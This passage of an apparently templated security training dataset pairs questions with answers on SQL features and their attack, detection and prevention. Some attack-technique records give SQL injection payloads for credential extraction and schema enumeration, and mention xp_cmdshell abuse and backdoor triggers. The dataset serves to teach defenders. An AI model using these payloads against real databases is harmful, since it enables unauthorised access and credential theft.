detect these attacks by:\n- Unexpected table access in queries\n- Query complexity spikes\n- CROSS JOIN detection", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074266Z", "updated_at": "2025-12-17T19:35:42.074266Z"} +{"id": "trtp-17ba6d255dd7", "instruction": "What log entries indicate SQL JOIN Operations attacks?", "output": "Methods for 
detecting SQL JOIN Operations attacks or anomalies:\n\n- Unexpected table access in queries\n- Query complexity spikes\n- CROSS JOIN detection\n- Multi-table access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074278Z", "updated_at": "2025-12-17T19:35:42.074278Z"} +{"id": "trtp-c895a68a5f89", "instruction": "How can organizations protect against SQL JOIN Operations?", "output": "Security controls and preventive measures for SQL JOIN Operations:\n\n- View-based access control\n- Query complexity limits\n- Table-level permissions\n- Column-level access restrictions\n\nJOINs expose relationships between tables. Attackers use JOINs in injection to access data across table boundaries. 
Understanding JOINs helps in both exploitation (extracting related data) and defense (query complexity limits).", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074290Z", "updated_at": "2025-12-17T19:35:42.074290Z"} +{"id": "trtp-3fa58243fa7f", "instruction": "What does SQL JOIN Operations look like in SQL?", "output": "Example of SQL JOIN Operations:\n\n```sql\nSELECT u.username, o.order_id FROM users u INNER JOIN orders o ON u.user_id = o.user_id;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074301Z", "updated_at": "2025-12-17T19:35:42.074301Z"} +{"id": "trtp-4fb87bc463b0", "instruction": "Explain SQL UNION Operator from a security perspective.", "output": "UNION combines result sets from multiple SELECT statements. UNION-based SQL injection is a powerful technique for extracting data from arbitrary tables by appending malicious SELECT statements to legitimate queries.\n\nSecurity Relevance: UNION injection is one of the most effective data extraction techniques. Attackers append SELECT statements to extract credentials, sensitive data, or database schema information. 
Column count and type matching are key challenges.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076114Z", "updated_at": "2025-12-17T19:35:42.076114Z"} +{"id": "trtp-4eaa87a0bdf5", "instruction": "What are the key components of SQL UNION Operator?", "output": "SQL UNION Operator consists of the following key components:\n\n- UNION (removes duplicates)\n- UNION ALL (keeps duplicates)\n- Column count matching requirement\n- Data type compatibility\n- ORDER BY with UNION", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076134Z", "updated_at": "2025-12-17T19:35:42.076134Z"} +{"id": "trtp-efdac9655d7e", "instruction": "From a security perspective, why should defenders understand SQL UNION Operator?", "output": "UNION injection is one of the most effective data extraction techniques. Attackers append SELECT statements to extract credentials, sensitive data, or database schema information. 
Column count and type matching are key challenges.\n\nCommon attack vectors include:\n- Data extraction: ' UNION SELECT username, password FROM users--\n- Schema enumeration: UNION SELECT table_name, column_name FROM information_schema.columns\n- File reading (database-specific functions)\n- NULL-based column discovery: UNION SELECT NULL, NULL, NULL--", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076150Z", "updated_at": "2025-12-17T19:35:42.076150Z"} +{"id": "trtp-7c22b585cd1a", "instruction": "How do attackers abuse SQL UNION Operator?", "output": "Attack techniques involving SQL UNION Operator:\n\n- Data extraction: ' UNION SELECT username, password FROM users--\n- Schema enumeration: UNION SELECT table_name, column_name FROM information_schema.columns\n- File reading (database-specific functions)\n- NULL-based column discovery: UNION SELECT NULL, NULL, NULL--\n\nDefenders can detect these attacks by:\n- UNION keyword in user input\n- information_schema access patterns\n- Response size anomalies", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076166Z", "updated_at": "2025-12-17T19:35:42.076166Z"} +{"id": "trtp-0baa8f72f434", "instruction": "What indicators 
reveal malicious activity involving SQL UNION Operator?", "output": "Methods for detecting SQL UNION Operator attacks or anomalies:\n\n- UNION keyword in user input\n- information_schema access patterns\n- Response size anomalies\n- Column count probing patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076179Z", "updated_at": "2025-12-17T19:35:42.076179Z"} +{"id": "trtp-d16a8892e28a", "instruction": "How can organizations protect against SQL UNION Operator?", "output": "Security controls and preventive measures for SQL UNION Operator:\n\n- Parameterized queries prevent UNION injection\n- Restrict information_schema access\n- Query result limits\n- Web Application Firewall rules\n\nUNION injection is one of the most effective data extraction techniques. Attackers append SELECT statements to extract credentials, sensitive data, or database schema information. 
Column count and type matching are key challenges.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076192Z", "updated_at": "2025-12-17T19:35:42.076192Z"} +{"id": "trtp-3b09cb9d7613", "instruction": "What is the syntax for SQL UNION Operator?", "output": "Example of SQL UNION Operator:\n\n```sql\nSELECT product_name, price FROM products UNION SELECT username, password FROM users;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-union-operator", "license": "original", "retrieved_at": "2025-12-17T19:35:42.076084Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.076202Z", "updated_at": "2025-12-17T19:35:42.076202Z"} +{"id": "trtp-2746ba70025c", "instruction": "What is SQL Subqueries and why is it important for database security?", "output": "Subqueries are queries nested within other queries. They execute independently and return results used by the outer query. Subqueries enable complex data extraction in injection attacks and can bypass simple input filtering.\n\nSecurity Relevance: Subqueries enable sophisticated injection attacks that bypass simple filters. 
Attackers use subqueries to extract data, enumerate schemas, or perform conditional logic that reveals information through application behavior.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078083Z", "updated_at": "2025-12-17T19:35:42.078083Z"} +{"id": "trtp-ff8f62baf5be", "instruction": "What are the key components of SQL Subqueries?", "output": "SQL Subqueries consists of the following key components:\n\n- Scalar subqueries (single value)\n- Table subqueries (result set)\n- Correlated subqueries\n- Subqueries in WHERE, FROM, SELECT\n- EXISTS and NOT EXISTS\n- IN with subqueries", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078104Z", "updated_at": "2025-12-17T19:35:42.078104Z"} +{"id": "trtp-a694f859c598", "instruction": "What security risks are associated with SQL Subqueries?", "output": "Subqueries enable sophisticated injection attacks that bypass simple filters. 
Attackers use subqueries to extract data, enumerate schemas, or perform conditional logic that reveals information through application behavior.\n\nCommon attack vectors include:\n- Subquery injection for data extraction\n- EXISTS-based blind injection\n- Correlated subqueries for row-by-row extraction\n- Filter bypass through nested queries", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078118Z", "updated_at": "2025-12-17T19:35:42.078118Z"} +{"id": "trtp-6494fde03595", "instruction": "What attacks exploit SQL Subqueries?", "output": "Attack techniques involving SQL Subqueries:\n\n- Subquery injection for data extraction\n- EXISTS-based blind injection\n- Correlated subqueries for row-by-row extraction\n- Filter bypass through nested queries\n\nDefenders can detect these attacks by:\n- Nested SELECT patterns in input\n- Query complexity metrics\n- Subquery execution monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078131Z", "updated_at": "2025-12-17T19:35:42.078131Z"} +{"id": "trtp-8b1e1fa1d744", "instruction": "How do you detect exploitation of SQL Subqueries?", "output": "Methods for detecting SQL Subqueries attacks or anomalies:\n\n- Nested SELECT 
patterns in input\n- Query complexity metrics\n- Subquery execution monitoring\n- Performance anomalies from complex subqueries", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078143Z", "updated_at": "2025-12-17T19:35:42.078143Z"} +{"id": "trtp-ed4ccf8452e8", "instruction": "How can organizations protect against SQL Subqueries?", "output": "Security controls and preventive measures for SQL Subqueries:\n\n- Parameterized queries handle subqueries safely\n- Query timeout limits\n- Complexity restrictions\n- Allowlist input validation\n\nSubqueries enable sophisticated injection attacks that bypass simple filters. 
Attackers use subqueries to extract data, enumerate schemas, or perform conditional logic that reveals information through application behavior.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078154Z", "updated_at": "2025-12-17T19:35:42.078154Z"} +{"id": "trtp-3cbce75156d0", "instruction": "What does SQL Subqueries look like in SQL?", "output": "Example of SQL Subqueries:\n\n```sql\nSELECT * FROM products WHERE price > (SELECT AVG(price) FROM products);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-subqueries", "license": "original", "retrieved_at": "2025-12-17T19:35:42.078054Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.078165Z", "updated_at": "2025-12-17T19:35:42.078165Z"} +{"id": "trtp-e769746e89bd", "instruction": "How does SQL Stored Procedures work and what are its security implications?", "output": "Stored procedures are precompiled SQL code stored in the database. They can encapsulate business logic, provide security through abstraction, but also introduce vulnerabilities if they use dynamic SQL internally.\n\nSecurity Relevance: Stored procedures can improve security by abstracting direct table access, but procedures with dynamic SQL are vulnerable to second-order injection. 
Some procedures (like xp_cmdshell) provide dangerous system access.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.079996Z", "updated_at": "2025-12-17T19:35:42.079996Z"} +{"id": "trtp-0e21339adb31", "instruction": "What are the key components of SQL Stored Procedures?", "output": "SQL Stored Procedures consists of the following key components:\n\n- Procedure creation and parameters\n- Input/output parameters\n- Return values\n- Error handling\n- Transaction control within procedures\n- Dynamic SQL in procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080016Z", "updated_at": "2025-12-17T19:35:42.080016Z"} +{"id": "trtp-e4b781483cba", "instruction": "Why is SQL Stored Procedures important for database security?", "output": "Stored procedures can improve security by abstracting direct table access, but procedures with dynamic SQL are vulnerable to second-order injection. 
Some procedures (like xp_cmdshell) provide dangerous system access.\n\nCommon attack vectors include:\n- Injection through dynamic SQL in procedures\n- Abuse of dangerous procedures (xp_cmdshell)\n- Privilege escalation via procedure execution\n- Second-order injection through procedure parameters", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080030Z", "updated_at": "2025-12-17T19:35:42.080030Z"} +{"id": "trtp-57252800b5a3", "instruction": "What are common attack techniques involving SQL Stored Procedures?", "output": "Attack techniques involving SQL Stored Procedures:\n\n- Injection through dynamic SQL in procedures\n- Abuse of dangerous procedures (xp_cmdshell)\n- Privilege escalation via procedure execution\n- Second-order injection through procedure parameters\n\nDefenders can detect these attacks by:\n- Procedure execution auditing\n- Dynamic SQL within procedure monitoring\n- Dangerous procedure usage alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080056Z", "updated_at": "2025-12-17T19:35:42.080056Z"} +{"id": "trtp-b1cc05279e60", "instruction": "What log entries indicate SQL Stored Procedures attacks?", "output": "Methods for detecting SQL 
Stored Procedures attacks or anomalies:\n\n- Procedure execution auditing\n- Dynamic SQL within procedure monitoring\n- Dangerous procedure usage alerts\n- Parameter analysis for injection patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080068Z", "updated_at": "2025-12-17T19:35:42.080068Z"} +{"id": "trtp-a0241ec8a96d", "instruction": "What security controls mitigate SQL Stored Procedures risks?", "output": "Security controls and preventive measures for SQL Stored Procedures:\n\n- Use parameterized queries within procedures\n- Disable dangerous system procedures\n- Principle of least privilege for procedure execution\n- Code review for dynamic SQL patterns\n\nStored procedures can improve security by abstracting direct table access, but procedures with dynamic SQL are vulnerable to second-order injection. 
Some procedures (like xp_cmdshell) provide dangerous system access.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080084Z", "updated_at": "2025-12-17T19:35:42.080084Z"} +{"id": "trtp-045245d2628d", "instruction": "What is the syntax for SQL Stored Procedures?", "output": "Example of SQL Stored Procedures:\n\n```sql\nCREATE PROCEDURE GetUserByID(@UserID INT) AS SELECT * FROM users WHERE user_id = @UserID;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-stored-procedures", "license": "original", "retrieved_at": "2025-12-17T19:35:42.079958Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.080095Z", "updated_at": "2025-12-17T19:35:42.080095Z"} +{"id": "trtp-7a281e609c66", "instruction": "What is SQL Views and why is it important for database security?", "output": "Views are virtual tables defined by SELECT statements. They can provide security by restricting visible columns/rows, but improper view definitions can leak sensitive data or enable injection through view definitions.\n\nSecurity Relevance: Views can implement column-level and row-level security, hiding sensitive data from users. However, views that expose functions or allow updates can introduce vulnerabilities. 
View definitions may leak schema information.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082289Z", "updated_at": "2025-12-17T19:35:42.082289Z"} +{"id": "trtp-91ec9fa8d08b", "instruction": "What are the main parts of SQL Views that security teams should understand?", "output": "SQL Views consists of the following key components:\n\n- Simple views (single table)\n- Complex views (joins, aggregations)\n- Updatable views\n- WITH CHECK OPTION\n- Materialized views\n- Security-definer views", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082310Z", "updated_at": "2025-12-17T19:35:42.082310Z"} +{"id": "trtp-5b730fee41eb", "instruction": "Why is SQL Views important for database security?", "output": "Views can implement column-level and row-level security, hiding sensitive data from users. However, views that expose functions or allow updates can introduce vulnerabilities. 
View definitions may leak schema information.\n\nCommon attack vectors include:\n- View bypass to access underlying tables\n- Schema enumeration through view definitions\n- Injection through updatable views\n- Information leakage via view errors", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082324Z", "updated_at": "2025-12-17T19:35:42.082324Z"} +{"id": "trtp-4ad752349d66", "instruction": "What threats are associated with SQL Views?", "output": "Attack techniques involving SQL Views:\n\n- View bypass to access underlying tables\n- Schema enumeration through view definitions\n- Injection through updatable views\n- Information leakage via view errors\n\nDefenders can detect these attacks by:\n- View access patterns\n- Attempts to access underlying tables directly\n- View definition access monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082338Z", "updated_at": "2025-12-17T19:35:42.082338Z"} +{"id": "trtp-328957dd592d", "instruction": "What indicators reveal malicious activity involving SQL Views?", "output": "Methods for detecting SQL Views attacks or anomalies:\n\n- View access patterns\n- Attempts to access underlying tables directly\n- View definition access 
monitoring\n- UPDATE/DELETE on views", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082350Z", "updated_at": "2025-12-17T19:35:42.082350Z"} +{"id": "trtp-8c5a7c57f746", "instruction": "How do you defend against SQL Views attacks?", "output": "Security controls and preventive measures for SQL Views:\n\n- Use views to restrict data access\n- Revoke direct table access when using views\n- WITH CHECK OPTION for updatable views\n- Regular view permission auditing\n\nViews can implement column-level and row-level security, hiding sensitive data from users. However, views that expose functions or allow updates can introduce vulnerabilities. 
View definitions may leak schema information.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082361Z", "updated_at": "2025-12-17T19:35:42.082361Z"} +{"id": "trtp-ee8a1e94b58f", "instruction": "What does SQL Views look like in SQL?", "output": "Example of SQL Views:\n\n```sql\nCREATE VIEW public_users AS SELECT user_id, username, email FROM users WHERE is_public = TRUE;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-views", "license": "original", "retrieved_at": "2025-12-17T19:35:42.082251Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.082372Z", "updated_at": "2025-12-17T19:35:42.082372Z"} +{"id": "trtp-a3a868701f6f", "instruction": "Explain SQL Triggers from a security perspective.", "output": "Triggers are procedures that execute automatically in response to database events (INSERT, UPDATE, DELETE). They can enforce business rules but also introduce security risks through unintended side effects or privilege escalation.\n\nSecurity Relevance: Triggers execute with the definer's privileges, potentially enabling privilege escalation. 
Malicious triggers can persist backdoors, exfiltrate data on every change, or cause denial of service through recursive execution.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084604Z", "updated_at": "2025-12-17T19:35:42.084604Z"} +{"id": "trtp-928e1919ccae", "instruction": "What are the key components of SQL Triggers?", "output": "SQL Triggers consists of the following key components:\n\n- BEFORE and AFTER triggers\n- INSERT, UPDATE, DELETE triggers\n- INSTEAD OF triggers\n- Row-level vs statement-level triggers\n- Trigger cascading\n- NEW and OLD references", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084644Z", "updated_at": "2025-12-17T19:35:42.084644Z"} +{"id": "trtp-1cb307d9175d", "instruction": "What security risks are associated with SQL Triggers?", "output": "Triggers execute with the definer's privileges, potentially enabling privilege escalation. 
Malicious triggers can persist backdoors, exfiltrate data on every change, or cause denial of service through recursive execution.\n\nCommon attack vectors include:\n- Trigger-based persistence (backdoor triggers)\n- Data exfiltration through triggers\n- Privilege escalation via trigger execution context\n- Denial of service through trigger recursion", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084661Z", "updated_at": "2025-12-17T19:35:42.084661Z"} +{"id": "trtp-bc1a26b94b51", "instruction": "What attacks exploit SQL Triggers?", "output": "Attack techniques involving SQL Triggers:\n\n- Trigger-based persistence (backdoor triggers)\n- Data exfiltration through triggers\n- Privilege escalation via trigger execution context\n- Denial of service through trigger recursion\n\nDefenders can detect these attacks by:\n- Trigger inventory monitoring\n- Unexpected trigger creation/modification\n- Trigger execution auditing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084674Z", "updated_at": "2025-12-17T19:35:42.084674Z"} +{"id": "trtp-f03be622405d", "instruction": "How do you detect exploitation of SQL Triggers?", "output": "Methods for detecting SQL Triggers attacks or 
anomalies:\n\n- Trigger inventory monitoring\n- Unexpected trigger creation/modification\n- Trigger execution auditing\n- Performance impact from triggers", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084685Z", "updated_at": "2025-12-17T19:35:42.084685Z"} +{"id": "trtp-bca4735a5565", "instruction": "How can organizations protect against SQL Triggers?", "output": "Security controls and preventive measures for SQL Triggers:\n\n- Restrict trigger creation privileges\n- Regular trigger auditing\n- Trigger execution context control\n- Disable unnecessary triggers\n\nTriggers execute with the definer's privileges, potentially enabling privilege escalation. 
Malicious triggers can persist backdoors, exfiltrate data on every change, or cause denial of service through recursive execution.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084697Z", "updated_at": "2025-12-17T19:35:42.084697Z"} +{"id": "trtp-4f15eb569dfa", "instruction": "What does SQL Triggers look like in SQL?", "output": "Example of SQL Triggers:\n\n```sql\nCREATE TRIGGER audit_user_changes AFTER UPDATE ON users FOR EACH ROW INSERT INTO audit_log VALUES (OLD.*, NEW.*);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-triggers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.084545Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.084707Z", "updated_at": "2025-12-17T19:35:42.084707Z"} +{"id": "trtp-d082b9aeea33", "instruction": "How does SQL User-Defined Functions work and what are its security implications?", "output": "User-defined functions (UDFs) extend SQL with custom logic. They can be written in SQL or external languages. UDFs present security risks when they provide system access or execute with elevated privileges.\n\nSecurity Relevance: UDFs in languages like C can execute arbitrary code with database server privileges. Even SQL UDFs can encapsulate dangerous operations. 
